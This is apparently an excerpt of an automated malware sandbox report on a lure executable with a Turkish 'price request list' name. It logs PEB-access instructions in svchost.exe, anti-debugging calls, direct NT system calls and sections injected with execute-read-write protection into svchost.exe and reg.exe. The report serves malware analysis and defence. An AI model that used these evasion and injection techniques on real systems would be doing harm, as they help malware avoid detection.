                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001BA124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Code function: 0_2_001BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtDeviceIoControlFile: Direct from: 0x77012AEC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtAllocateVirtualMemory: Direct from: 0x77012BEC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtAllocateVirtualMemory: Direct from: 0x770148EC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtSetInformationThread: Direct from: 0x77012B4C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQueryAttributesFile: Direct from: 0x77012E6C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQueryVolumeInformationFile: Direct from: 0x77012F2C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtOpenSection: Direct from: 0x77012E0C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQuerySystemInformation: Direct from: 0x770148CC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtOpenKeyEx: Direct from: 0x77012B9C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtProtectVirtualMemory: Direct from: 0x77012F9C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtCreateFile: Direct from: 0x77012FEC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtOpenFile: Direct from: 0x77012DCC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQueryInformationToken: Direct from: 0x77012CAC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtTerminateThread: Direct from: 0x77012FCC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtProtectVirtualMemory: Direct from: 0x77007B2E
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtAllocateVirtualMemory: Direct from: 0x77012BFC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtReadFile: Direct from: 0x77012ADC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtNotifyChangeKey: Direct from: 0x77013C2C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtCreateMutant: Direct from: 0x770135CC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtSetInformationProcess: Direct from: 0x77012C5C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtResumeThread: Direct from: 0x770136AC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtSetInformationThread: Direct from: 0x770063F9
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtWriteVirtualMemory: Direct from: 0x77012E3C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtMapViewOfSection: Direct from: 0x77012D1C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtAllocateVirtualMemory: Direct from: 0x77013C9C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtWriteVirtualMemory: Direct from: 0x7701490C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtClose: Direct from: 0x77012B6C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtReadVirtualMemory: Direct from: 0x77012E8C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtCreateKey: Direct from: 0x77012C6C
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtDelayExecution: Direct from: 0x77012DDC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQuerySystemInformation: Direct from: 0x77012DFC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtQueryInformationProcess: Direct from: 0x77012C26
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtResumeThread: Direct from: 0x77012FBC
                Source: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe NtCreateUserProcess: Direct from: 0x7701371C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\GCXkjJfnLpqeNWrbCBnxfNSIvuGNdmaLjBbQFrtCdlTp\uD8F5JGUDvEpNoCYQYtn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
